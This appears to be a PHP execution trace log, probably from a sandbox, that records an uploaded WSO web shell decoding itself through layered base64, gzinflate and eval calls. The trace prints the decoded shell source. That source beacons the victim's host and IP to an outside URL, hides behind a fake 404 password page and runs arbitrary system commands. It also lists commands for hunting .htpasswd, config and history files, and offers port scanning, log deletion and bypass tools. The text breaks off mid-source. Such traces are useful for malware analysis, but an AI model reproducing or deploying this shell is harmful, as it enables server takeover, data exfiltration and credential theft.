3 A /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 28 $default_action = 'FilesMan'
4 26 0 0.662501 1147544 define 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 29 2 'SELF_PATH' '/var/www/html/uploads/wso.php(4) : eval()\'d code(1) : eval()\'d code'
4 26 1 0.662548 1147648
4 26 R TRUE
4 27 0 0.662564 1147576 strpos 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 30 2 'python-requests/2.25.1' 'Google'
4 27 1 0.662606 1147648
4 27 R FALSE
4 28 0 0.662629 1147576 session_start 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 32 0
4 28 1 0.662698 1148328
4 28 R TRUE
4 29 0 0.662714 1148328 error_reporting 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 33 1 0
4 29 1 0.662728 1148368
4 29 R 0
4 30 0 0.662742 1148328 ini_set 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 34 2 'error_log' NULL
4 30 1 0.662758 1148400
4 30 R ''
4 31 0 0.662771 1148328 ini_set 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 35 2 'display_errors' 0
4 31 1 0.662786 1148400
4 31 R ''
4 32 0 0.662798 1148328 ini_set 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 36 2 'log_errors' 0
4 32 1 0.662812 1148400
4 32 R '1'
4 33 0 0.662825 1148328 ini_set 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 37 2 'max_execution_time' 0
4 33 1 0.662841 1148432
4 33 R '30'
4 34 0 0.662853 1148328 set_time_limit 0 /var/www/html/uploads/wso.php(4) : eval()'d code(1) : eval()'d code 38 1 0
4 34 1 0.662868 1148392
4 34 R FALSE
3 12 1 0.662890 1149824
2 7 1 0.662907 1062800
1 3 1 0.662915 1061224
1 35 0 0.662922 1061256 Error->__toString 0 Unknown 0 0
2 36 0 0.662934 1061336 Error->getTraceAsString 0 Unknown 0 0
2 36 1 0.662946 1061592
2 36 R '#0 /var/www/html/uploads/wso.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso.php(4): eval()\n#2 {main}'
1 35 1 0.662966 1065728
1 35 R 'Error: Call to undefined function set_magic_quotes_runtime() in /var/www/html/uploads/wso.php(4) : eval()\'d code(1) : eval()\'d code:39\nStack trace:\n#0 /var/www/html/uploads/wso.php(4) : eval()\'d code(1): eval()\n#1 /var/www/html/uploads/wso.php(4): eval()\n#2 {main}'
0.663017 986224
TRACE END [2023-02-12 22:59:58.609456]
data/traces/9d98853a714da34855a92cb5ba345601_trace-1676256279.2748.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:45:05.172639]
1 0 1 0.000188 393528
1 3 0 0.000426 426944 {main} 1 /var/www/html/uploads/wso1.php.PDF 0 0
1 A /var/www/html/uploads/wso1.php.PDF 2 $stt1 = 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
1 A /var/www/html/uploads/wso1.php.PDF 3 $stt0 = '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
2 4 0 0.000508 426944 base64_decode 0 /var/www/html/uploads/wso1.php.PDF 4 1 'Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JTc5PSdUoLikqSi3TUCkuKTHQBAFrAA=='
2 4 1 0.000528 427104
2 4 R 'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2 5 0 0.000550 427072 gzinflate 0 /var/www/html/uploads/wso1.php.PDF 4 1 'K-K��P��S�K�*�K��-(J-.�H���K�I,I�HJ,N53�OIM�OI�(.)*J-�P).)1�\004\001k\000'
2 5 1 0.000574 427200
2 5 R 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2 6 0 0.000592 427040 htmlspecialchars_decode 0 /var/www/html/uploads/wso1.php.PDF 4 1 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2 6 1 0.000610 427072
2 6 R 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));'
2 7 0 0.000638 428600 eval 1 'eval(\'?>\'.gzuncompress(gzinflate(base64_decode(strrev($stt0)))));' /var/www/html/uploads/wso1.php.PDF 4 0
3 8 0 0.000655 428600 strrev 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code 1 1 '==giaRh0F8f5IE/G8KH5v3IrqLs6PW3pZepZ8ytzr6s71BYnpA7XVH31eY+tJ+/e60aZbdeepGlru9DAMNP3V7GzKVc+4uPCbp554MJkh+HSTi3r2oyCd0O7KjMNaXviU0qmnvjD6UJ7RzGzLYVVz1JAFuSWKjB4WtG/AzcKYr8PeubxVD8RVwj3MvqAUeaYyUqujBuNQ1FpKL57P5FVHy0eGO5PhJzo6knxE0V7zpyIr2JdeTCYVsd2Vex0PPcSXUbmQ1PX9bUnAics2mJU9kptWMUb9y/rczV0AgygbmdlgIRBuT2rMyL0W4nuZvy0yUWZ5Vm5hdyupK5uxfh7CiKxzO7Gl6tg2W2ci7cwxYQeQuAAjtTkmA+yB6ZelB35NFTLp3e/R0SiMav4BnZLFg5MnC0M3ZCR20GZaClJAP7UmAENRrckT8yopoeiXGYqwtqjdxmyEb8mHahwqCnMmKNLYmgYqZywKUnSvK8nHLUuTZ+vKkH961C15zKzaOYF'
3 8 1 0.000708 461400
3 8 R 'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3 9 0 0.000754 461368 base64_decode 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code 1 1 'AZhaZ6V4nO29a1sbO/I4+D7Pk+/Q6cOctk+Mb0ACHEy4BwgBYkNICFmm3d22O7TdPt02xsnk5X6nfb/Pfq+tKl1affEFTmb29//vnBliWyqVSiWpVCqVShtv+p3+82etYc8auH5Pe+sMjs5z+R/Pn2nwn9vKtZ2B07vP6YcXF+e3uydH+6cXt0fnej6vcRj8b8HtazVtEuifDPCn5nihk0T56fbgrH61Xd/b38NvsxGnCvwZgbstLRcOAvh/DkoWNKNgxPERzkEXkToPfc+3HS0HQAWsSEUU1T0I3G4Oi3wpf1UhfqqNmkxyff/92cX+7fbeXkQpLxo4g2HQQ3hIh7SFByjXNEPn1fKt7VhAW84wD+tla8+/P6ker1jftkf27sq35ngtPPlQqxn5Iu+torFoFHlJp8dKdgaD/nqpZBQXbhv79Y/79S8Gse/wrHFhfFVS6/sfLvcbF7eX9SODWgg9JIbDrfPghoMwZ1jDwLt1e+4A+Pn8GW/tgtUBirdk'
3 9 1 0.000869 494168
3 9 R '\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3 10 0 0.001317 461368 gzinflate 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code 1 1 '\001�Zg�x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000'
3 10 1 0.001767 485976
3 10 R 'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3 11 0 0.002215 453176 gzuncompress 0 /var/www/html/uploads/wso1.php.PDF(4) : eval()'d code 1 1 'x��k[\033;�8�>ϓ���Ü�O�o@\002\034L�\a\b\001bCH\bY��ݶ;��>�6����~�}��~��*]Z}�\005Nf����\031b[*�J%�T*�J\033o����g�a�\032�~O{�\f��s�\037ÏŸi��ʵ��ӻ��\027\027ç·»\'G��\027�G�z>�q\030�o��k5m\022�\f��x��D���~�]����o�\021�\n�\031��--\027\016\002�\016J\0264�`��\021�A\027�:\017}Ï·\035-\a@\005�HE\024�=\b�n\016�|)U!~���Lr}������^D)/\0328�a�CxH���\a(�4C����X@[�0\017�ekÏ¿?�\036�X߶G��ʷ�x-<�P�\031�"ï¢ï¿½h\024yI��Jv\006��z�d\024\027n\033�����/\006���qa|UR�\037.�\033\027���#�Z\b=$�í��0gX��u{�\000���\031o'
3 11 1 0.002922 539224
3 11 R '<?php\r\nfunction GetIP(){\r\n if(getenv("HTTP_CLIENT_IP")) {\r\n $ip = getenv("HTTP_CLIENT_IP");\r\n } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n if (strstr($ip, \',\')) {\r\n $tmp = explode (\',\', $ip);\r\n $ip = trim($tmp[0]);\r\n }\r\n } else {\r\n $ip = getenv("REMOTE_ADDR");\r\n }\r\n return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\''
3 12 0 0.005737 1143856 eval 1 '?><?php\r\nfunction GetIP(){\r\n if(getenv("HTTP_CLIENT_IP")) {\r\n $ip = getenv("HTTP_CLIENT_IP");\r\n } elseif(getenv("HTTP_X_FORWARDED_FOR")) {\r\n $ip = getenv("HTTP_X_FORWARDED_FOR");\r\n if (strstr($ip, \',\')) {\r\n $tmp = explode (\',\', $ip);\r\n $ip = trim($tmp[0]);\r\n }\r\n } else {\r\n $ip = getenv("REMOTE_ADDR");\r\n }\r\n return $ip;\r\n}\r\n$x = base64_decode(\'aHR0cDovL2J5cjAwdC5jby9sLQ==\').GetIP().\'-\'.base64_encode(\'http://\'.$_SERVER[\'HTTP_HOST\'].$_SERVER[\'REQUEST_URI\']);\r\nif(function_exists(\'curl_init\'))\r\n{\r\n $ch = @curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);\r\n if($gitt == false){\r\n @$gitt = file_get_contents($x);\r\n }\r\n}elseif(function_exists(\'file_get_contents\')){\r\n @$gitt = file_get_contents($x);\r\n}\r\n?><?php $auth_pass = "a6d13df8a46cf713e5cda6a6c0d043bf";\r\n $color = "#00ff66";\r\n $default_action = \'FilesMan\';\r\n @define(\'SELF_PATH\', __FILE__);\r\n if( strpos($_SERVER[\'HTTP_USER_AGENT\'],\'Google\') !== false ) { header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n } @session_start();\r\n @error_reporting(0);\r\n @ini_set(\'error_log\',NULL);\r\n @ini_set(\'display_errors\',0);\r\n @ini_set(\'log_errors\',0);\r\n @ini_set(\'max_execution_time\',0);\r\n @set_time_limit(0);\r\n @set_magic_quotes_runtime(0);\r\n @define(\'VERSION\', \'\');\r\n if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n } $_POST = stripslashes_array($_POST);\r\n } function printLogin() { echo \'<h1>Not Found</h1>\r\n <p>The requested URL was not found on this server.</p>\r\n <hr>\r\n <address>Apache Server at \'.$_SERVER[\'HTTP_HOST\'].\' Port 80</address>\r\n <style>input { margin:0;\r\nbackground-color:#fff;\r\nborder:1px solid #fff;\r\n }</style>\r\n <center><form method=post><input type=password name=pass></form></center>\';\r\n exit;\r\n } if( !isset( $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] )) if( empty( $auth_pass ) || ( isset( $_POST[\'pass\'] ) && ( md5($_POST[\'pass\']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER[\'HTTP_HOST\'])] = true;\r\n else printLogin();\r\n if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = \'win\';\r\n else $os = \'nix\';\r\n $safe_mode = @ini_get(\'safe_mode\');\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $home_cwd = @getcwd();\r\n if( isset( $_POST[\'c\'] ) ) @chdir($_POST[\'c\']);\r\n $cwd = @getcwd();\r\n if( $os == \'win\') { $home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n $cwd = str_replace("\\\\", "/", $cwd);\r\n } if( $cwd[strlen($cwd)-1] != \'/\' ) $cwd .= \'/\';\r\n if($os == \'win\') { $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );\r\n } else { $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \\"config*\\"", "find config* files in current dir" => "find . -type f -name \\"config*\\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate \'.conf\'", "locate .pwd files" => "locate \'.pwd\'", "locate .sql files" => "locate \'.sql\'", "locate .htpasswd files" => "locate \'.htpasswd\'", "locate .bash_history files" => "locate \'.bash_history\'", "locate .mysql_history files" => "locate \'.mysql_history\'", "locate .fetchmailrc files" => "locate \'.fetchmailrc\'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" );\r\n } function ex($in) { $out = \'\';\r\n if(function_exists(\'exec\')) { @exec($in,$out);\r\n $out = @join("\\n",$out);\r\n }elseif(function_exists(\'passthru\')) { ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'system\')) { ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n }elseif(function_exists(\'shell_exec\')) { $out = shell_exec($in);\r\n }elseif(is_resource($f = @popen($in,"r"))) { $out = "";\r\n while(!@feof($f)) $out .= fread($f,1024);\r\n pclose($f);\r\n } return $out;\r\n } function which($p) { $path = ex(\'which \'.$p);\r\n if(!empty($path)) return $path;\r\n return false;\r\n } function printHeader() { if(empty($_POST[\'charset\'])) $_POST[\'charset\'] = "UTF-8";\r\n global $color;\r\n echo \'<html><head><meta http-equiv="Content-Type" content="text/html;\r\n charset=\'.$_POST[\'charset\'].\'"><title>r00t.info wso Shell</title><link REL="SHORTCUT ICON" HREF="http://imagizer.imageshack.us/a/img440/4273/6fix.png">\r\n <style>\r\n body {background-color:#222;\r\ncolor:#fff;\r\n}\r\n body,td,th { font: 9pt Lucida,Verdana;\r\nmargin:0;\r\nvertical-align:top;\r\n }\r\n span,h1,a { color:\'.$color.\' !important;\r\n }\r\n span { font-weight: bolder;\r\n }\r\n h1 { padding: 2px 5px;\r\nfont: 14pt Verdana;\r\nmargin:0px 0 0 5px;\r\n }\r\n div.content { padding: 5px;\r\nmargin:0 5px;\r\nbackground: #333333;\r\nborder-bottom:5px solid #444;\r\n}\r\n a { text-decoration:none;\r\n }\r\n a:hover { /*background:#5e5e5e;\r\n*/ }\r\n .ml1 { border:1px solid #444;\r\npadding:5px;\r\nmargin:0;\r\noverflow: auto;\r\n }\r\n .bigarea { width:100%;\r\nheight:250px;\r\nmargin-top:5px;\r\n}\r\n input, textarea, select { margin:0;\r\ncolor:#ff8c00;\r\nbackground-color:#555;\r\nborder:1px solid \'.$color.\';\r\n font: 9pt Monospace,"Courier New";\r\n }\r\n input[type="button"]:hover,input[type="submit"]:hover {background-color:\'.$color.\';\r\ncolor:#000;\r\n} \r\n form { margin:0px;\r\n }\r\n #toolsTbl { text-align:center;\r\n }\r\n .toolsInp { width: 80%;\r\n }\r\n .main th {text-align:left;\r\nbackground-color:#555;\r\nfont-weight: bold;\r\n}\r\n .main tr:hover{background-color:#008080;\r\n}\r\n .main td, th{vertical-align:middle;\r\n}\r\n .menu {background: #333;\r\n}\r\n .menu th{padding:5px;\r\nfont-weight:bold;\r\n}\r\n .menu th:hover{background:#008080;\r\n}\r\n .l1 {background-color:#444;\r\n}\r\n pre {font-family:Courier,Monospace;\r\n}\r\n #cot_tl_fixed{position:fixed;\r\nbottom:0px;\r\nfont-size:12px;\r\nleft:0px;\r\npadding:4px 0;\r\nclip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);\r\n_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);\r\n}\r\n .logo {text-align:center;\r\nfont-size:60px;\r\n}\r\n .logo sup {font-size: 15px;\r\nvertical-align: top;\r\nmargin-left: -14px;\r\n}\r\n .cpr {margin-bottom:5px;\r\nfont-weight:bold;\r\n}\r\n .cpb {width:34px;\r\nmargin:0 5px;\r\n}\r\n .eca1 {font-size: 16px;\r\nfont-weight: bold;\r\nletter-spacing: 10px;\r\nmargin: 0 2px 0 17px;\r\ntext-align: center;\r\n}\r\n .eca2 {font-size: 13px;\r\nfont-weight: bold;\r\nletter-spacing: 3px;\r\nmargin: 0 2px 0 7px;\r\ntext-align: center;\r\n}\r\n .npoad td {padding:0;\r\n}\r\n </style>\r\n <script>\r\n function set(a,c,p1,p2,p3,charset) {\r\n if(a != null)document.mf.a.value=a;\r\n\r\n if(c != null)document.mf.c.value=c;\r\n\r\n if(p1 != null)document.mf.p1.value=p1;\r\n\r\n if(p2 != null)document.mf.p2.value=p2;\r\n\r\n if(p3 != null)document.mf.p3.value=p3;\r\n\r\n if(charset != null)document.mf.charset.value=charset;\r\n\r\n }\r\n function g(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n document.mf.submit();\r\n\r\n }\r\n function a(a,c,p1,p2,p3,charset) {\r\n set(a,c,p1,p2,p3,charset);\r\n\r\n var params = "ajax=true";\r\n\r\n for(i=0;\r\ni<document.mf.elements.length;\r\ni++)\r\n params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);\r\n\r\n sr("\'.$_SERVER[\'REQUEST_URI\'].\'", params);\r\n\r\n }\r\n function sr(url, params) { \r\n if (window.XMLHttpRequest) {\r\n req = new XMLHttpRequest();\r\n\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n } \r\n else if (window.ActiveXObject) {\r\n req = new ActiveXObject("Microsoft.XMLHTTP");\r\n\r\n if (req) {\r\n req.onreadystatechange = processReqChange;\r\n\r\n req.open("POST", url, true);\r\n\r\n req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");\r\n\r\n req.send(params);\r\n\r\n }\r\n }\r\n }\r\n function processReqChange() {\r\n if( (req.readyState == 4) )\r\n if(req.status == 200) {\r\n //alert(req.responseText);\r\n\r\n var reg = new RegExp("(\\\\d+)([\\\\S\\\\s]*)", "m");\r\n\r\n var arr=reg.exec(req.responseText);\r\n\r\n eval(arr[2].substr(0, arr[1]));\r\n\r\n } \r\n else alert("Request error!");\r\n\r\n }\r\n </script>\r\n <head><body><div style="position:absolute;\r\nwidth:100%;\r\ntop:0;\r\nleft:0;\r\n"><div style="margin:5px;\r\nbackground:#444;\r\n"><div class="content" style="border-top:5px solid #444;\r\n">\r\n <form method=post name=mf style="display:none;\r\n">\r\n <input type=hidden name=a value="\'.(isset($_POST[\'a\'])?$_POST[\'a\']:\'\').\'">\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=p1 value="\'.(isset($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'">\r\n <input type=hidden name=p2 value="\'.(isset($_POST[\'p2\'])?htmlspecialchars($_POST[\'p2\']):\'\').\'">\r\n <input type=hidden name=p3 value="\'.(isset($_POST[\'p3\'])?htmlspecialchars($_POST[\'p3\']):\'\').\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n </form>\';\r\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n $totalSpace = $totalSpace?$totalSpace:1;\r\n $disable_functions = @ini_get(\'disable_functions\');\r\n $release = @php_uname(\'r\');\r\n $kernel = @php_uname(\'s\');\r\n if(!function_exists(\'posix_getegid\')) { $user = @get_current_user();\r\n $uid = @getmyuid();\r\n $gid = @getmygid();\r\n $group = "?";\r\n } else { $uid = @posix_getpwuid(@posix_geteuid());\r\n $gid = @posix_getgrgid(@posix_getegid());\r\n $user = $uid[\'name\'];\r\n $uid = $uid[\'uid\'];\r\n $group = $gid[\'name\'];\r\n $gid = $gid[\'gid\'];\r\n } $cwd_links = \'\';\r\n $path = explode("/", $GLOBALS[\'cwd\']);\r\n $n=count($path);\r\n for($i=0;\r\n$i<$n-1;\r\n$i++) { $cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\r\n for($j=0;\r\n$j<=$i;\r\n$j++) $cwd_links .= $path[$j].\'/\';\r\n $cwd_links .= "\\")\'>".$path[$i]."/</a>";\r\n } $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n $opt_charsets = \'\';\r\n foreach($charsets as $item) $opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Delete LOG\'=>\'DeleteLOG\',\'Safe Mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Cgi\'=>\'Cgi\',\'Network\'=>\'Network\',\'Readable Dirs\'=>\'Readable\',\'Port Scanner\'=>\'PortScanner\',\'Symlink\'=>\'Symlink\',\'SQLBUDDY\'=>\'SQLBUDDY\',\'Bypass\'=>\'Bypass\',\'Python\'=>\'Python\');\r\n if(!empty($GLOBALS[\'auth_pass\'])) $m[\'SelfKill\'] = \'SelfRemove\';\r\n $m[\'Logout\'] = \'Logout\';\r\n $menu = \'\';\r\n foreach($m as $k => $v) $menu .= \'<th><a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a></th>\';\r\n $drives = "";\r\n if ($GLOBALS[\'os\'] == \'win\') { foreach( range(\'a\',\'z\') as $drive ){ if (is_dir($drive.\':\\\\\')) $drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\r\n } $drives .= \'<br />: \';\r\n } if($GLOBALS[\'os\'] == \'nix\') { $dominios = @file_get_contents("/etc/named.conf");\r\n if(!$dominios) { $d0c = "CANT READ named.conf";\r\n } else { @preg_match_all(\'/.*?zone "(.*?)" {/\', $dominios, $out);\r\n $out = sizeof(array_unique($out[1]));\r\n $d0c = $out." Domains";\r\n } } else { $d0c = " --- ";\r\n } if($GLOBALS[\'os\'] == \'nix\' ) { $usefl = \'\';\r\n $dwnldr = \'\';\r\n if(!@ini_get(\'safe_mode\')) { $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n foreach($userful as $item) { if(which($item)) $usefl.= $item.\',\';\r\n } $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n foreach($downloaders as $item2) { if(which($item2)) $dwnldr.= $item2.\',\';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } } else { $usefl = \' ------- \';\r\n $dwnldr = \' ------- \';\r\n } echo \'<table class="info" cellpadding="0" cellspacing="0" width="100%"><tr><td width="160px"><div class="logo"><img src="http://i.hizliresim.com/z4lrbR.png" id="logo" height="75%" width="90%"/></div><hr style="margin: -5px 13px 2px 17px;\r\nwidth:160px;\r\n"><div class="eca1"></div><div class="eca2">Hackers</div></td>\r\n <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="125px;\r\n"><span>Uname</span></td><td>: <nobr>\'.substr(@php_uname(), 0, 120).\'</nobr></td></tr>\r\n <tr><td><span>User</span></td><td>: \'.$uid.\' ( \'.$user.\' ) <span>Group: </span> \'.$gid.\' ( \'.$group.\' )</td></tr><tr><td><span>Server</span></td><td>: \'.@getenv(\'SERVER_SOFTWARE\').\'</td></tr><tr><td><span>Useful</span></td><td>: \'.$usefl.\'</td></tr><tr><td><span>Downloaders</span></td><td>: \'.$dwnldr.\'</td></tr><tr><td><span>Disabled functions</span></td><td>: \'.($disable_functions?$disable_functions:\'All Function Enable\').\'</td></tr><tr><td><span>\'.($GLOBALS[\'os\'] == \'win\'?\'Drives<br 